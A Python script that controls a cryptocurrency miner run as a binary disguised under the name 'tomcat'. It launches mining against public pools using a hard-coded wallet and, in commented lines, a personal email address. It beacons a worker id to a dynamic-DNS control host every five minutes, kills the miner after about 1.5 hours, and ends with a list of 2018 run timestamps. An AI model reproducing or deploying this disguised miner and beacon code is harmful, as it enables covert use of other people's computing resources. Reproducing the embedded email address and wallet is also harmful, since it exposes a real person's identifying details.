import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:05.586956
#2018-02-17 16:43:01.790136
#2018-02-17 18:31:07.737210
#2018-02-17 20:19:06.481891
#2018-02-17 22:06:03.944168
#2018-02-17 23:50:05.883933
#2018-02-18 01:39:04.136471
#2018-02-18 03:26:03.880389
#2018-02-18 05:13:07.006888
#2018-02-18 07:06:05.041549
#2018-02-18 08:54:01.999679
#2018-02-18 10:41:01.617406
#2018-02-18 12:26:02.141093
#2018-02-18 14:14:01.746696
#2018-02-18 16:04:06.517134
#2018-02-18 17:53:06.978502
#2018-02-18 19:40:07.978516
#2018-02-18 21:25:04.165537
#2018-02-18 23:14:01.540508
#2018-02-19 01:01:02.015521
#2018-02-19 02:48:07.313767
#2018-02-19 04:34:04.276185
#2018-02-19 06:19:07.195075
#2018-02-19 08:07:04.097200
#2018-02-19 09:57:07.691467
#2018-02-19 11:47:05.303633
#2018-02-19 13:34:06.288276
#2018-02-19 15:23:04.238908
#2018-02-19 17:10:10.362771
#2018-02-19 18:58:10.666390
#2018-02-19 20:45:09.664151
#2018-02-19 22:33:03.740024
#2018-02-20 00:17:01.957075
#2018-02-20 02:05:01.367398
#2018-02-20 03:55:07.315412
#2018-02-20 05:40:02.671850
#2018-02-20 07:26:04.516488
#2018-02-20 09:10:07.173160
#2018-02-20 10:52:09.610548
#2018-02-20 12:41:01.327722
#2018-02-20 14:26:06.476425
#2018-02-20 16:10:06.892077
#2018-02-20 17:55:11.716316
#2018-02-20 19:47:06.532858
#2018-02-20 21:36:05.231618
#2018-02-20 23:18:02.116595
#2018-02-21 01:03:05.363896
#2018-02-21 02:48:06.367420
#2018-02-21 04:32:04.106502
#2018-02-21 06:19:03.743706
#2018-02-21 08:04:07.483332
#2018-02-21 09:49:07.536493
#2018-02-21 11:39:07.803331
#2018-02-21 13:28:06.188003
#2018-02-21 15:13:05.951875
#2018-02-21 17:04:10.483657
#2018-02-21 18:52:04.686562
#2018-02-21 20:45:08.937130
#2018-02-21 22:29:04.662622
#2018-02-22 00:18:06.543873
#2018-02-22 02:06:03.745644
#2018-02-22 03:53:07.085116
#2018-02-22 05:41:04.839853
#2018-02-22 07:26:04.586654
#2018-02-22 09:13:04.872420
#2018-02-22 11:00:11.859913
#2018-02-22 12:47:05.515617
#2018-02-22 14:33:08.192907
#2018-02-22 16:20:09.095363
#2018-02-22 18:06:09.888997
#2018-02-22 19:54:11.333803
#2018-02-22 21:43:04.956930
#2018-02-22 23:32:04.740600
#2018-02-23 01:20:07.185377
#2018-02-23 03:06:06.155176
#2018-02-23 04:54:03.544953
#2018-02-23 06:39:04.026614
#2018-02-23 08:27:06.120277
#2018-02-23 10:43:03.541356
#2018-02-23 12:39:04.071128
#2018-02-23 14:23:09.925977
#2018-02-23 16:15:10.776515
#2018-02-23 18:02:07.521812
#2018-02-23 19:47:01.259555
#2018-02-23 21:31:08.423949
#2018-02-23 23:19:03.692704
#2018-02-24 01:11:06.038737
#2018-02-24 03:03:01.435803
#2018-02-24 04:49:03.501756
#2018-02-24 06:34:07.805900
#2018-02-24 08:23:01.900523
#2018-02-24 10:06:01.298183
#2018-02-24 12:03:07.069661
#2018-02-24 13:51:06.454419
#2018-02-24 15:38:05.081810
#2018-02-24 17:32:07.276710
#2018-02-24 19:18:06.767728
#2018-02-24 21:07:06.114859
#2018-02-24 23:40:09.632809
#2018-02-25 03:01:05.107907
#2018-02-25 06:47:03.547944